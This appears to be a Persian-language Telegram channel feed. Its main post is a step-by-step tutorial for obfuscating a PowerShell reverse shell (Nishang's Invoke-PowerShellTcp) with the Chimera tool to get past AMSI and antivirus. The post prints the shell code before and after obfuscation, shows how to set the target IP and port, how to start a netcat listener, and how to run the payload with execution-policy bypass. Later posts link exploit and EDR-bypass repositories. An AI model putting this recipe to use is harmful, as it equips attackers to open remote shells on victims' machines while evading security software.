ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
1. نصب پیش نیاز ها :
1. ساخت Payload :
1.2 تغییر ایپی :
پورت دیفالت اسکریپت 444 هستش :
1. ایجاد Listener در لینوکس با NetCat :
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
➖➖➖➖➖➖➖➖
✅ نحوه ی نصب در Linux :1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
2. کلون کردن ریپو :sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) : sudo chown root:root -R /opt/chimera/
4. تغییر مسیر به opt/chimera/ :cd /opt/chimera/
5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :sudo chmod +x chimera.sh
6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :./chimera.sh —help
➖➖➖➖➖➖➖➖
✅ نحوه ی استفاده از اسکریپت :1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1
2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖
✅ گرفتن دسترسی :1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :powershell.exe -ep bypass C:\<PATH>\Payload.ps1
و تمام.امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
GitHub
nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
🔥2
AI Exploits
This repository, ai-exploits, is a collection of exploits and scanning templates for responsibly disclosed vulnerabilities affecting machine learning tools..:
https://github.com/protectai/ai-exploits
This repository, ai-exploits, is a collection of exploits and scanning templates for responsibly disclosed vulnerabilities affecting machine learning tools..:
https://github.com/protectai/ai-exploits
GitHub
GitHub - protectai/ai-exploits: A collection of real world AI/ML exploits for responsibly disclosed vulnerabilities
A collection of real world AI/ML exploits for responsibly disclosed vulnerabilities - GitHub - protectai/ai-exploits: A collection of real world AI/ML exploits for responsibly disclosed vulnerabil...
یک آزمایشگاه کوچیک خوب برای تمرین و روش های دور زدن Antivirus , EDR
🟡 Little AV/EDR bypassing lab for training & learning purposes
🌐 https://github.com/Xacone/BestEdrOfTheMarket
🟡 Little AV/EDR bypassing lab for training & learning purposes
🌐 https://github.com/Xacone/BestEdrOfTheMarket
GitHub
GitHub - Xacone/BestEdrOfTheMarket: EDR Lab for Experimentation Purposes
EDR Lab for Experimentation Purposes. Contribute to Xacone/BestEdrOfTheMarket development by creating an account on GitHub.
👍1
درمورد چه مباحثی دوست دارید بیشتر داکیومنت و کتاب بزارم
Anonymous Poll
30%
برنامه نویسی
24%
شبکه
40%
هک و امنیت
6%
دواپس
درمورد کدوم زبان برنامه نویسی بیشتر کتاب و داکیومنت بزارم
Anonymous Poll
34%
C/C++
4%
C#
13%
PHP, JavaScript
32%
Python
3%
SQL
10%
Rust
4%
Ruby, Scala, . . . . .